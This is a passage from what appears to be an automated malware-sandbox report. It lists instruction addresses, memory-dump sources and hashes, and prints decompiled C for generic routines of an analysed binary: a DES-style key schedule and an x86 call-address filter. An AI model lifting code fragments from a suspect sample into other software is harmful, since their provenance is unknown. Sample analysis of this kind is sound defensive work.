                                                                                                                                                      0x1000b98b
                                                                                                                                                      0x1000b98d
                                                                                                                                                      0x1000b98f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000b995
                                                                                                                                                      0x1000b99b
                                                                                                                                                      0x1000ba1a
                                                                                                                                                      0x1000ba1c
                                                                                                                                                      0x1000ba1e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000ba24
                                                                                                                                                      0x1000ba2a
                                                                                                                                                      0x1000baa9
                                                                                                                                                      0x1000baab
                                                                                                                                                      0x1000baad
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000bab9
                                                                                                                                                      0x1000bb39
                                                                                                                                                      0x1000bb3b
                                                                                                                                                      0x1000bb3d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000bb43
                                                                                                                                                      0x1000bb49
                                                                                                                                                      0x1000bbc8
                                                                                                                                                      0x1000bbca
                                                                                                                                                      0x1000bbcc
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000bbd2
                                                                                                                                                      0x1000bbd8
                                                                                                                                                      0x1000bc49
                                                                                                                                                      0x1000bc4b
                                                                                                                                                      0x1000bc4d
                                                                                                                                                      0x1000bc4f
                                                                                                                                                      0x1000bc4f
                                                                                                                                                      0x1000bc51
                                                                                                                                                      0x1000c9ad
                                                                                                                                                      0x1000c9ad
                                                                                                                                                      0x1000bbe1
                                                                                                                                                      0x1000bbe3
                                                                                                                                                      0x1000bbf4
                                                                                                                                                      0x1000bbfc
                                                                                                                                                      0x1000bbfe
                                                                                                                                                      0x1000bc0f
                                                                                                                                                      0x1000bc17
                                                                                                                                                      0x1000bc19
                                                                                                                                                      0x1000bc2e
                                                                                                                                                      0x1000bc36
                                                                                                                                                      0x1000bc38
                                                                                                                                                      0x1000bc45
                                                                                                                                                      0x1000bc45
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000bc38
                                                                                                                                                      0x1000bc22
                                                                                                                                                      0x1000bc28
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000bc2a
                                                                                                                                                      0x1000bc2a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000bc2a
                                                                                                                                                      0x1000bc07
                                                                                                                                                      0x1000bc0d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000bc0d
                                                                                                                                                      0x1000bbec
                                                                                                                                                      0x1000bbf2
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000bbf2
                                                                                                                                                      0x1000bb52
                                                                                                                                                      0x1000bb54
                                                                                                                                                      0x1000bb6b
                                                                                                                                                      0x1000bb73
                                                                                                                                                      0x1000bb75
                                                                                                                                                      0x1000bb8c
                                                                                                                                                      0x1000bb94
                                                                                                                                                      0x1000bb96
                                                                                                                                                      0x1000bbad
                                                                                                                                                      0x1000bbb5
                                                                                                                                                      0x1000bbb7
                                                                                                                                                      0x1000bbc4
                                                                                                                                                      0x1000bbc4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000bbb7
                                                                                                                                                      0x1000bba3
                                                                                                                                                      0x1000bba7
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000bba7
                                                                                                                                                      0x1000bb82
                                                                                                                                                      0x1000bb86
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000bb86
                                                                                                                                                      0x1000bb61
                                                                                                                                                      0x1000bb65
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000bb65
                                                                                                                                                      0x1000bac3
                                                                                                                                                      0x1000bac5
                                                                                                                                                      0x1000badc
                                                                                                                                                      0x1000bae4
                                                                                                                                                      0x1000bae6
                                                                                                                                                      0x1000bafd
                                                                                                                                                      0x1000bb05
                                                                                                                                                      0x1000bb07
                                                                                                                                                      0x1000bb1e
                                                                                                                                                      0x1000bb26
                                                                                                                                                      0x1000bb28
                                                                                                                                                      0x1000bb35
                                                                                                                                                      0x1000bb35
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000bb28
                                                                                                                                                      0x1000bb14
                                                                                                                                                      0x1000bb18
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000bb18
                                                                                                                                                      0x1000baf3
                                                                                                                                                      0x1000baf7
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000baf7
                                                                                                                                                      0x1000bad2
                                                                                                                                                      0x1000bad6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000bad6
                                                                                                                                                      0x1000ba33
                                                                                                                                                      0x1000ba35
                                                                                                                                                      0x1000ba4c
                                                                                                                                                      0x1000ba54
                                                                                                                                                      0x1000ba56
                                                                                                                                                      0x1000ba6d
                                                                                                                                                      0x1000ba75
                                                                                                                                                      0x1000ba77
                                                                                                                                                      0x1000ba8e
                                                                                                                                                      0x1000ba96
                                                                                                                                                      0x1000ba98
                                                                                                                                                      0x1000baa5
                                                                                                                                                      0x1000baa5
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000ba98
                                                                                                                                                      0x1000ba84
                                                                                                                                                      0x1000ba88
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000ba88
                                                                                                                                                      0x1000ba63
                                                                                                                                                      0x1000ba67
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000ba67
                                                                                                                                                      0x1000ba42
                                                                                                                                                      0x1000ba46
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000ba46
                                                                                                                                                      0x1000b9a4
                                                                                                                                                      0x1000b9a6
                                                                                                                                                      0x1000b9bd
                                                                                                                                                      0x1000b9c5
                                                                                                                                                      0x1000b9c7
                                                                                                                                                      0x1000b9de
                                                                                                                                                      0x1000b9e6
                                                                                                                                                      0x1000b9e8
                                                                                                                                                      0x1000b9ff
                                                                                                                                                      0x1000ba07
                                                                                                                                                      0x1000ba09
                                                                                                                                                      0x1000ba16
                                                                                                                                                      0x1000ba16
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000ba09
                                                                                                                                                      0x1000b9f5
                                                                                                                                                      0x1000b9f9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000b9f9
                                                                                                                                                      0x1000b9d4
                                                                                                                                                      0x1000b9d8
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000b9d8
                                                                                                                                                      0x1000b9b3
                                                                                                                                                      0x1000b9b7
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000b9b7
                                                                                                                                                      0x1000b915
                                                                                                                                                      0x1000b917
                                                                                                                                                      0x1000b92e
                                                                                                                                                      0x1000b936
                                                                                                                                                      0x1000b938
                                                                                                                                                      0x1000b94f
                                                                                                                                                      0x1000b957
                                                                                                                                                      0x1000b959
                                                                                                                                                      0x1000b970
                                                                                                                                                      0x1000b978
                                                                                                                                                      0x1000b97a
                                                                                                                                                      0x1000b987
                                                                                                                                                      0x1000b987
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000b97a
                                                                                                                                                      0x1000b966
                                                                                                                                                      0x1000b96a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000b96a
                                                                                                                                                      0x1000b945
                                                                                                                                                      0x1000b949
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000b949
                                                                                                                                                      0x1000b924
                                                                                                                                                      0x1000b928
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000b88b
                                                                                                                                                      0x1000b88b
                                                                                                                                                      0x1000b88e
                                                                                                                                                      0x1000b892
                                                                                                                                                      0x1000b894
                                                                                                                                                      0x1000b8a7
                                                                                                                                                      0x1000b8a7
                                                                                                                                                      0x1000b8ab
                                                                                                                                                      0x1000b8af
                                                                                                                                                      0x1000b8b1
                                                                                                                                                      0x1000b8c4
                                                                                                                                                      0x1000b8c4
                                                                                                                                                      0x1000b8c8
                                                                                                                                                      0x1000b8cc
                                                                                                                                                      0x1000b8ce
                                                                                                                                                      0x1000b8e1
                                                                                                                                                      0x1000b8e1
                                                                                                                                                      0x1000b8e5
                                                                                                                                                      0x1000b8e9
                                                                                                                                                      0x1000b8eb
                                                                                                                                                      0x1000b8f1
                                                                                                                                                      0x1000b8f4
                                                                                                                                                      0x1000b8f8
                                                                                                                                                      0x1000b8f8
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000b8eb
                                                                                                                                                      0x1000b8d4
                                                                                                                                                      0x1000b8d7
                                                                                                                                                      0x1000b8db
                                                                                                                                                      0x1000b8df
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000b8df
                                                                                                                                                      0x1000b8b7
                                                                                                                                                      0x1000b8ba
                                                                                                                                                      0x1000b8be
                                                                                                                                                      0x1000b8c2
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000b8c2
                                                                                                                                                      0x1000b89a
                                                                                                                                                      0x1000b89d
                                                                                                                                                      0x1000b8a1
                                                                                                                                                      0x1000b8a5
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000b8a5
                                                                                                                                                      0x1000b87c
                                                                                                                                                      0x1000b87c
                                                                                                                                                      0x00000000

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                                                      • Instruction ID: 55efa1d2f927fdc953ecf4dca7577f682825efda3464cd734a0d60072d3cab8c
                                                                                                                                                      • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                                                      • Instruction Fuzzy Hash: 12C16373D0EDB3469375C92D406862AEEA2EFC16C132BC7A1DCD43F29DDA269D0196D0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00404050, Relevance: .2, Instructions: 242COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 63c1cff88951b8667d274ae00652a9baddfe48e3b2f170758f72ab398b897506
                                                                                                                                                      • Instruction ID: 2b86ebebbdeca26a2c1eb46e2f1d79578d317ad6d63c0af1ccad913a5bda3f46
                                                                                                                                                      • Opcode Fuzzy Hash: 63c1cff88951b8667d274ae00652a9baddfe48e3b2f170758f72ab398b897506
                                                                                                                                                      • Instruction Fuzzy Hash: 76515C757000209FCB09ED38C6E47BA76A3AB9A320F31457DEA03C7795EB789C519661
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00403FA9, Relevance: .2, Instructions: 233COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 60ebc83629a87436f67ebaafbbe235d528208f463ee8c33f3b1f036cb47a863e
                                                                                                                                                      • Instruction ID: 2f9f1e6a2aece42fcd3e34ac5cac9d877e031cb9bd7ee95541b9e947ecaecab5
                                                                                                                                                      • Opcode Fuzzy Hash: 60ebc83629a87436f67ebaafbbe235d528208f463ee8c33f3b1f036cb47a863e
                                                                                                                                                      • Instruction Fuzzy Hash: CB518D757001209FCB09DD7886A07BA77E3AB8E320F35457DEA03C7789EAB89C519661
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001EDDB, Relevance: .2, Instructions: 209COMMONCrypto
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1001EDDB() {
				signed int _t69;
				void* _t273;

				L0:
				while(1) {
					L0:
					 *((intOrPtr*)(_t273 - 8)) =  *((intOrPtr*)(_t273 - 8)) + 1;
					if( *((intOrPtr*)(_t273 - 8)) >= 0x10) {
						break;
					}
					L2:
					if( *((intOrPtr*)(_t273 - 8)) < 2 ||  *((intOrPtr*)(_t273 - 8)) == 8 ||  *((intOrPtr*)(_t273 - 8)) == 0xf) {
						 *(_t273 - 0x10) = ( *(_t273 - 0x10) << 0x00000001 |  *(_t273 - 0x10) >> 0x0000001b) & 0x0fffffff;
						 *(_t273 - 0xc) = ( *(_t273 - 0xc) << 0x00000001 |  *(_t273 - 0xc) >> 0x0000001b) & 0x0fffffff;
					} else {
						 *(_t273 - 0x10) = ( *(_t273 - 0x10) << 0x00000002 |  *(_t273 - 0x10) >> 0x0000001a) & 0x0fffffff;
						 *(_t273 - 0xc) = ( *(_t273 - 0xc) << 0x00000002 |  *(_t273 - 0xc) >> 0x0000001a) & 0x0fffffff;
					}
					L7:
					 *( *(_t273 + 8)) =  *(_t273 - 0x10) << 0x00000004 & 0x24000000 |  *(_t273 - 0x10) << 0x0000001c & 0x10000000 |  *(_t273 - 0x10) << 0x0000000e & 0x08000000 |  *(_t273 - 0x10) << 0x00000012 & 0x02080000 |  *(_t273 - 0x10) << 0x00000006 & 0x01000000 |  *(_t273 - 0x10) << 0x00000009 & 0x00200000 |  *(_t273 - 0x10) >> 0x00000001 & 0x00100000 |  *(_t273 - 0x10) << 0x0000000a & 0x00040000 |  *(_t273 - 0x10) << 0x00000002 & 0x00020000 |  *(_t273 - 0x10) >> 0x0000000a & 0x00010000 |  *(_t273 - 0xc) >> 0x0000000d & 0x00002000 |  *(_t273 - 0xc) >> 0x00000004 & 0x00001000 |  *(_t273 - 0xc) << 0x00000006 & 0x00000800 |  *(_t273 - 0xc) >> 0x00000001 & 0x00000400 |  *(_t273 - 0xc) >> 0x0000000e & 0x00000200 |  *(_t273 - 0xc) & 0x00000100 |  *(_t273 - 0xc) >> 0x00000005 & 0x00000020 |  *(_t273 - 0xc) >> 0x0000000a & 0x00000010 |  *(_t273 - 0xc) >> 0x00000003 & 0x00000008 |  *(_t273 - 0xc) >> 0x00000012 & 0x00000004 |  *(_t273 - 0xc) >> 0x0000001a & 0x00000002 |  *(_t273 - 0xc) >> 0x00000018 & 0x00000001;
					 *(_t273 + 8) =  &(( *(_t273 + 8))[1]);
					_t69 =  *(_t273 - 0xc) >> 0x00000015 & 0x00000002;
					 *( *(_t273 + 8)) =  *(_t273 - 0x10) << 0x0000000f & 0x20000000 |  *(_t273 - 0x10) << 0x00000011 & 0x10000000 |  *(_t273 - 0x10) << 0x0000000a & 0x08000000 |  *(_t273 - 0x10) << 0x00000016 & 0x04000000 |  *(_t273 - 0x10) >> 0x00000002 & 0x02000000 |  *(_t273 - 0x10) << 0x00000001 & 0x01000000 |  *(_t273 - 0x10) << 0x00000010 & 0x00200000 |  *(_t273 - 0x10) << 0x0000000b & 0x00100000 |  *(_t273 - 0x10) << 0x00000003 & 0x00080000 |  *(_t273 - 0x10) >> 0x00000006 & 0x00040000 |  *(_t273 - 0x10) << 0x0000000f & 0x00020000 |  *(_t273 - 0x10) >> 0x00000004 & 0x00010000 |  *(_t273 - 0xc) >> 0x00000002 & 0x00002000 |  *(_t273 - 0xc) << 0x00000008 & 0x00001000 |  *(_t273 - 0xc) >> 0x0000000e & 0x00000808 |  *(_t273 - 0xc) >> 0x00000009 & 0x00000400 |  *(_t273 - 0xc) & 0x00000200 |  *(_t273 - 0xc) << 0x00000007 & 0x00000100 |  *(_t273 - 0xc) >> 0x00000007 & 0x00000020 |  *(_t273 - 0xc) >> 0x00000003 & 0x00000011 |  *(_t273 - 0xc) << 0x00000002 & 0x00000004 | _t69;
					 *(_t273 + 8) =  &(( *(_t273 + 8))[1]);
				}
				L8:
				return _t69;
			}





                                                                                                                                                      0x1001eddb
                                                                                                                                                      0x1001eddb
                                                                                                                                                      0x1001eddb
                                                                                                                                                      0x1001ede1
                                                                                                                                                      0x1001ede8
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001edee
                                                                                                                                                      0x1001edf2
                                                                                                                                                      0x1001ee13
                                                                                                                                                      0x1001ee29
                                                                                                                                                      0x1001ee2e
                                                                                                                                                      0x1001ee41
                                                                                                                                                      0x1001ee58
                                                                                                                                                      0x1001ee58
                                                                                                                                                      0x1001ee5b
                                                                                                                                                      0x1001ef72
                                                                                                                                                      0x1001ef7a
                                                                                                                                                      0x1001f091
                                                                                                                                                      0x1001f099
                                                                                                                                                      0x1001f0a1
                                                                                                                                                      0x1001f0a1
                                                                                                                                                      0x1001f0a9
                                                                                                                                                      0x1001f0ac

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 15336b38cef5e3b70785bcddc472e3849b2a8a6aa45a2ca6bb0c67a623ac097a
                                                                                                                                                      • Instruction ID: f23c4a30e7f9f6d640870cf1cfb0f7984c31d09a5f392b3c57acb847d210467d
                                                                                                                                                      • Opcode Fuzzy Hash: 15336b38cef5e3b70785bcddc472e3849b2a8a6aa45a2ca6bb0c67a623ac097a
                                                                                                                                                      • Instruction Fuzzy Hash: FB711072E108589BEB58CA5DCC957ADB7F3FB94340F14C268D13AE3189DA749606CB50
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1000ABA0, Relevance: .1, Instructions: 138COMMONCrypto
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1000ABA0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, unsigned int* _a16, intOrPtr _a20) {
				intOrPtr _t36;
				signed int _t46;
				unsigned int _t47;
				signed int _t51;
				intOrPtr _t56;
				signed char _t66;
				signed int _t67;
				signed char _t81;
				signed int* _t84;
				unsigned int _t87;
				void* _t88;
				unsigned int _t90;
				signed int _t93;
				intOrPtr _t100;
				void* _t102;

				_t36 = _a8;
				_t87 = 0;
				_t90 =  *_a16 & 0x00000007;
				if(_t36 >= 5) {
					_t100 = _a4;
					_a12 = _a12 + 5;
					_t56 = _t36 - 4 + _t100;
					_a8 = _t56;
					while(1) {
						_t84 = _t87 + _t100;
						if(_t84 >= _t56) {
							goto L6;
						}
						L4:
						while(( *_t84 & 0x000000fe) != 0xe8) {
							_t84 =  &(_t84[0]);
							if(_t84 < _t56) {
								continue;
							}
							goto L6;
						}
						L6:
						_t66 = _t84 - _t87 - _t100;
						_t88 = _t84 - _t100;
						if(_t84 < _t56) {
							if(_t66 <= 2) {
								_t93 = _t90 >> _t66;
								if(_t93 == 0 || _t93 <= 4 && _t93 != 3 && ((( &(_t84[0]))[_t93 >> 1] & 0x000000ff) + 0x00000001 & 0x000000fe) != 0) {
									goto L9;
								} else {
									_t90 = (_t93 | 0x00000008) >> 1;
									_t87 = _t88 + 1;
									continue;
								}
							} else {
								_t93 = 0;
								L9:
								_t67 = _t84[1] & 0x000000ff;
								_t10 = _t67 + 1; // 0x1
								if((_t10 & 0x000000fe) != 0) {
									_t100 = _a4;
									_t90 = (_t93 | 0x00000008) >> 1;
									_t87 = _t88 + 1;
								} else {
									_t46 = ((_t67 << 0x00000008 | _t84[0] & 0x000000ff) << 0x00000008 | _t84[0] & 0x000000ff) << 0x00000008 | _t84[0] & 0x000000ff;
									_t102 = _t88 + _a12;
									_t87 = _t88 + 5;
									if(_a20 == 0) {
										_t47 = _t46 - _t102;
									} else {
										_t47 = _t46 + _t102;
									}
									if(_t93 != 0) {
										_t81 = (_t93 & 0x00000006) + (_t93 & 0x00000006) + (_t93 & 0x00000006) + (_t93 & 0x00000006);
										if(((_t47 >> _t81) + 0x00000001 & 0x000000fe) == 0) {
											_t51 = _t47 ^ (0x00000100 << _t81) - 0x00000001;
											if(_a20 == 0) {
												_t47 = _t51 - _t102;
											} else {
												_t47 = _t51 + _t102;
											}
										}
										_t56 = _a8;
										_t90 = 0;
									}
									_t100 = _a4;
									_t84[0] = _t47;
									_t84[0] = _t47 >> 8;
									_t84[0] = _t47 >> 0x10;
									_t84[1] =  ~(_t47 >> 0x00000018 & 0x00000001);
								}
								while(1) {
									_t84 = _t87 + _t100;
									if(_t84 >= _t56) {
										goto L6;
									}
									goto L4;
								}
							}
						}
						if(_t66 <= 2) {
							 *_a16 = _t90 >> _t66;
							return _t88;
						} else {
							 *_a16 = 0;
							return _t88;
						}
						goto L29;
					}
				} else {
					return 0;
				}
				L29:
			}


















                                                                                                                                                      0x1000aba7
                                                                                                                                                      0x1000abac
                                                                                                                                                      0x1000abae
                                                                                                                                                      0x1000abb4
                                                                                                                                                      0x1000abbd
                                                                                                                                                      0x1000abc4
                                                                                                                                                      0x1000abc9
                                                                                                                                                      0x1000abcc
                                                                                                                                                      0x1000abd0
                                                                                                                                                      0x1000abd0
                                                                                                                                                      0x1000abd5
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000abd7
                                                                                                                                                      0x1000abe1
                                                                                                                                                      0x1000abe6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000abe6
                                                                                                                                                      0x1000abe8
                                                                                                                                                      0x1000abf0
                                                                                                                                                      0x1000abf4
                                                                                                                                                      0x1000abf6
                                                                                                                                                      0x1000abff
                                                                                                                                                      0x1000ac44
                                                                                                                                                      0x1000ac48
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000ac64
                                                                                                                                                      0x1000ac67
                                                                                                                                                      0x1000ac69
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000ac69
                                                                                                                                                      0x1000ac01
                                                                                                                                                      0x1000ac01
                                                                                                                                                      0x1000ac03
                                                                                                                                                      0x1000ac03
                                                                                                                                                      0x1000ac07
                                                                                                                                                      0x1000ac0c
                                                                                                                                                      0x1000acd1
                                                                                                                                                      0x1000acd8
                                                                                                                                                      0x1000acda
                                                                                                                                                      0x1000ac12
                                                                                                                                                      0x1000ac2d
                                                                                                                                                      0x1000ac33
                                                                                                                                                      0x1000ac36
                                                                                                                                                      0x1000ac3e
                                                                                                                                                      0x1000ac71
                                                                                                                                                      0x1000ac40
                                                                                                                                                      0x1000ac40
                                                                                                                                                      0x1000ac40
                                                                                                                                                      0x1000ac75
                                                                                                                                                      0x1000ac80
                                                                                                                                                      0x1000ac8a
                                                                                                                                                      0x1000ac96
                                                                                                                                                      0x1000ac9d
                                                                                                                                                      0x1000aca3
                                                                                                                                                      0x1000ac9f
                                                                                                                                                      0x1000ac9f
                                                                                                                                                      0x1000ac9f
                                                                                                                                                      0x1000ac9d
                                                                                                                                                      0x1000aca5
                                                                                                                                                      0x1000aca9
                                                                                                                                                      0x1000aca9
                                                                                                                                                      0x1000acab
                                                                                                                                                      0x1000acb4
                                                                                                                                                      0x1000acb7
                                                                                                                                                      0x1000acc6
                                                                                                                                                      0x1000acc9
                                                                                                                                                      0x1000acc9
                                                                                                                                                      0x1000abd0
                                                                                                                                                      0x1000abd0
                                                                                                                                                      0x1000abd5
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000abd5
                                                                                                                                                      0x1000abd0
                                                                                                                                                      0x1000abff
                                                                                                                                                      0x1000ace7
                                                                                                                                                      0x1000acff
                                                                                                                                                      0x1000ad02
                                                                                                                                                      0x1000ace9
                                                                                                                                                      0x1000acf2
                                                                                                                                                      0x1000acf5
                                                                                                                                                      0x1000acf5
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000ace7
                                                                                                                                                      0x1000abb7
                                                                                                                                                      0x1000abba
                                                                                                                                                      0x1000abba
                                                                                                                                                      0x00000000

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: f6e3104535204d036b25ea60b2bb06fad876bb0d58240bb9f7da43aff1db0e19
                                                                                                                                                      • Instruction ID: c69431555dc7ca5ac2ce956e03469d3cc4628eaa309f351326888c29aa5a1bcb
                                                                                                                                                      • Opcode Fuzzy Hash: f6e3104535204d036b25ea60b2bb06fad876bb0d58240bb9f7da43aff1db0e19
                                                                                                                                                      • Instruction Fuzzy Hash: 7F412733B082664BE714CD2C889056DFBD1EBD61A4F0B476DD9969738AD220CC89C7C1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 100071F0, Relevance: .1, Instructions: 96COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
